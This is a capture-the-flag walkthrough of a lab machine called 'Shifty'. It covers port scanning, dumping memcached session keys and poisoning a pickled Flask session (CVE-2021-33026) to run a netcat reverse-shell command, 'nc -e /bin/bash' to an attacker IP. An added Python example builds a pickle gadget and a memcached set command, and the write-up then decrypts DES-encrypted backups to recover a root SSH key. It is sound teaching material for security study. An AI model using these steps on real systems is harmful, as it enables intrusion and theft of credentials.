Shifty
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 4000 192.168.202.59
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-06 21:57 +08
Nmap scan report for 192.168.202.59
Host is up (0.17s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
53/tcp closed domain
80/tcp open http
5000/tcp open upnp
11211/tcp open memcache
Memcache was open, of all things. I did a detailed nmap scan as well:
$ sudo nmap -p 80,5000,11211 -sC -sV --min-rate 4000 192.168.202.59
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-06 21:58 +08
Nmap scan report for 192.168.202.59
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3
|_http-generator: Gatsby 2.22.15
|_http-server-header: nginx/1.10.3
|_http-title: Gatsby + Netlify CMS Starter
5000/tcp open http Werkzeug httpd 1.0.1 (Python 3.5.3)
|_http-server-header: Werkzeug/1.0.1 Python/3.5.3
|_http-title: Hello, world!
11211/tcp open memcached Memcached 1.4.33 (uptime 150 seconds)
Interesting.
Web + Memcache Enum
Port 80 looked rather static:

There was no public exploit for this software either, so let's move on. Port 5000 looked way more promising:

We can log in, but there is no other functionality on this site. Looking at the requests, the login simply assigned us a session token:

Moving to Memcache, we can dump it using memcdump. We instantly get loads of tokens:
$ memcdump --servers=192.168.202.59
<TRUNCATED>
session:8245fa94-7b27-4d99-a1c3-18a9f9db8e54
session:e90dd194-0be7-41f5-9362-a96431bea058
session:d5b40159-2bc4-4b57-91ae-2839ff3b040e
session:5cd631b0-49ba-4059-aae8-5dbae44f7c43
The last one was the same as above. I tried replacing the cookie within the request:
GET /admin HTTP/1.1
Host: 192.168.202.59:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.202.59:5000/login
Connection: close
Cookie: session=hellothere
Upgrade-Insecure-Requests: 1
Interestingly, this arbitrary cookie value then appeared as a key in Memcached, indicating the application stores whatever session ID the client supplies without validating it. Perhaps the session data behind that key could be poisoned?

Pickling RCE
I googled 'memcache cookie poisoning exploit' and looked at all the results. This repo was one of them:
It looked exactly like what I needed. So I tested it after resetting the VPN and the machine.
$ python3 cve-2021-33026_PoC.py --rhost '192.168.202.59' --rport '5000' --cmd 'nc -e /bin/bash 192.168.45.179 80' --cookie 'session:session=5cd631b0-49ba-4059-aae8-5dbae44f7c43'
[ASCII-art banner: PICKLE MEMCACHED POISONING]
We would get a shell on our listener port:
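To make the enumeration and poisoning steps above concrete, here is an added Python example; it is not the PoC from the repo, nor code from the target. It builds the commands memcdump-style tools send, parses the key list from a constructed `stats cachedump` reply, creates a pickle that runs a function when loaded (the poisoning primitive; a harmless `os.getcwd` stands in for the PoC's reverse shell), builds the memcached `set` command that would overwrite a `session:<id>` entry, and shows the defensive check: an Unpickler that refuses every global. It assumes the session store keeps pickled session data under the `session:<id>` keys seen in the dump, which the PoC's CVE-2021-33026 name implies but the page does not confirm.

```python
import io
import os
import pickle
import re

# Constructed sample of a memcached "stats cachedump" reply, modelled on the
# session:<uuid> keys seen in the memcdump output (sizes and times are made up).
SAMPLE_CACHEDUMP = (
    b"ITEM session:5cd631b0-49ba-4059-aae8-5dbae44f7c43 [31 b; 1688652000 s]\r\n"
    b"ITEM session:hellothere [31 b; 1688652010 s]\r\n"
    b"END\r\n"
)


def dump_commands(slab_class: int = 1, limit: int = 100) -> bytes:
    """What memcdump-style tools send: list slab classes, then dump keys per slab."""
    return b"stats items\r\n" + f"stats cachedump {slab_class} {limit}\r\n".encode()


def parse_cachedump(raw: bytes) -> list:
    """Extract key names from a 'stats cachedump' reply (ITEM <key> [<n> b; <t> s])."""
    keys = []
    for line in raw.split(b"\r\n"):
        m = re.match(rb"ITEM (\S+) \[", line)
        if m:
            keys.append(m.group(1).decode())
    return keys


class Gadget:
    """Object whose pickle calls func(*args) on load: the poisoning primitive.
    A real payload uses os.system with a reverse shell; os.getcwd keeps this harmless."""

    def __init__(self, func, args=()):
        self.func, self.args = func, args

    def __reduce__(self):
        return (self.func, self.args)


def poisoned_session(func=os.getcwd, args=()) -> bytes:
    """Serialised payload to store under the victim's session key."""
    return pickle.dumps(Gadget(func, args), protocol=2)


def plain_session(data: dict) -> bytes:
    """What a legitimate entry looks like under a pickle-backed session store."""
    return pickle.dumps(data, protocol=2)


def set_command(key: str, value: bytes, flags: int = 0, exptime: int = 0) -> bytes:
    """memcached text-protocol 'set' that overwrites the entry for key."""
    if len(key) > 250 or any(c.isspace() for c in key):
        raise ValueError("memcached keys must be <= 250 bytes with no whitespace")
    return f"set {key} {flags} {exptime} {len(value)}\r\n".encode() + value + b"\r\n"


def unsafe_loads(data: bytes):
    """The vulnerable pattern: pickle.loads on cache content an attacker can write."""
    return pickle.loads(data)


def current_dir() -> str:
    return os.getcwd()


class RestrictedUnpickler(pickle.Unpickler):
    """Defensive loader: refuses every global, so only plain data round-trips.
    The real fix is not to pickle cache content at all (use JSON)."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def safe_loads_rejects(data: bytes) -> bool:
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print(parse_cachedump(SAMPLE_CACHEDUMP))
    print(set_command("session:hellothere", poisoned_session()))
    print("payload ran on load:", unsafe_loads(poisoned_session()) == current_dir())
    print("restricted loader rejects it:", safe_loads_rejects(poisoned_session()))
```

Against a live target the bytes from `set_command` go over a plain TCP socket to port 11211, followed by a request to port 5000 carrying `Cookie: session=<id>` so the application loads the entry. Two caveats: `stats cachedump` is an unofficial command that truncates large slabs, so a dump is not guaranteed to be complete, and the exact key prefix and serialisation depend on the session library in use, which the page does not identify.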

Privilege Escalation
Encrypted Files -> Root SSH
There was a backup.py file within /opt/backups:
import sys
import os
import hashlib
from des import des, CBC, PAD_PKCS5   # pyDes-style API: des(key, mode, iv, pad, padmode)

def backup(name, file):
    # Output lands in ./data next to this script, named sha224(<path as given>)
    dest_dir = os.path.dirname(os.path.realpath(__file__)) + '/data'
    dest_name = hashlib.sha224(name.encode('utf-8')).hexdigest()
    with open('{}/{}'.format(dest_dir, dest_name), 'wb') as dest:
        data = file.read()
        # Hard-coded 8-byte DES key, all-zero IV, PKCS#5 padding
        k = des(b"87629ae8", CBC, b"\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
        ciphertext = k.encrypt(data)
        dest.write(ciphertext)

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: {} <file>'.format(sys.argv[0]))
        sys.exit(1)   # the original fell through and raised IndexError on sys.argv[1]
    FILENAME = sys.argv[1]
    FILENAME = os.path.abspath(FILENAME)   # so the hash covers the absolute path
    print('Backing up "{}"'.format(FILENAME))
    f = None
    try:
        f = open(FILENAME, 'rb')
        backup(FILENAME, f)
    except Exception as e:
        print('Could not open {}'.format(FILENAME))
        print(e)
    finally:
        if f:
            f.close()
In the data directory, there are also loads of encrypted files:
jerry@shifty:/opt/backups/data$ ls
0317ce62a75684cf0fcf8452a7fe5e5e919d1b730644bf16a304a919
11e3e83c5ea13aaed3b3ceb5edd72b9431ebc6ec2c447d412a0b7c7c
1a171f6f6491d3e4ca9cc0ca15a6c508c8815f6e29004bb29c0724d5
1cb607653518c3b1f08b1341322ead36dd8f93c3d2bfa23916fe28bd
1fd8c1281b186594d3d49f38cded4ce40faf862e9d409eb2a3a201cf
25a74de564e2aa81fbb8682f3fef798deda63f4cca65fd58901caecb
31328fa57f5c504df041f7f4f45498c766c0d12c33f78f33cff66bca
3fa4dcd297e960dc9e875437c67e7817356c487f57f828453756a2cc
403c9401a0224bd4f483dedb33ed0bf37fbd93881783ea0e600a49ff
5b1c7de10787e87d4d868457b7bf828154f1d02f653f2b57bce17abc
65895ecf8b82b9fa742e8fabde0fd7e60f1258a9e7ba3c1e9367a3e0
7297aeb420d0530ccb52dcb7f905ecc8deffefc32d02691561a9172e
7824132f0f0cc6da1dce3763d50c38c2941d07f9648e34c6c9b9ccf8
8cd58cbefd50ef93f1a3b173456f9b6a09a7318ada378c3a49a980f2
9038291aaa6b222363fc78837b934d1e2f96bb7cfe11fd3d73149e72
92e8127d493e205bfbd8a9c0dd165da2154768cebafa1c752d9bf0dc
dd533e5634f95c6d86a4f37f01453f5326c80e58b8a01f0a4222c011
dfe0444a971a789bb405c54c270ae25460f5699319aad697c7fd35ee
f166b490169e7de5795a09305837198579daad4694e233d49b126d91
I made a copy of all these files in my home directory and began decrypting them using openssl. From the Python script and the documentation for des, the key is the eight bytes 87629ae8 and the IV is eight null bytes. Because the script passes the key as a bytes object, openssl's -K option needs those ASCII bytes hex-encoded rather than the string parsed as hex, which gives 3837363239616538. The PAD_PKCS5 padding matches openssl's default, and since each output file is named sha224 of the absolute path that was backed up, the hashes can be matched against guessed paths before decrypting.
Then, we can decrypt a single file:
jerry@shifty:~/backup$ openssl enc -d -des-cbc -K 3837363239616538 -iv "0000000000000000" -in 3fa4dcd297e960dc9e875437c67e7817356c487f57f828453756a2cc -out decrypt
Then, we can bulk decrypt all of these files using a bash for loop (the variable is quoted so unusual filenames are safe; the rm only removes the copies):
for FILE in *; do openssl enc -d -des-cbc -K 3837363239616538 -iv "0000000000000000" -in "$FILE" -out "decrypt$FILE"; rm "$FILE"; done
We can then read all of the files. Among the decrypted files was an SSH private key:

Using this, we can ssh in as root:

Rooted!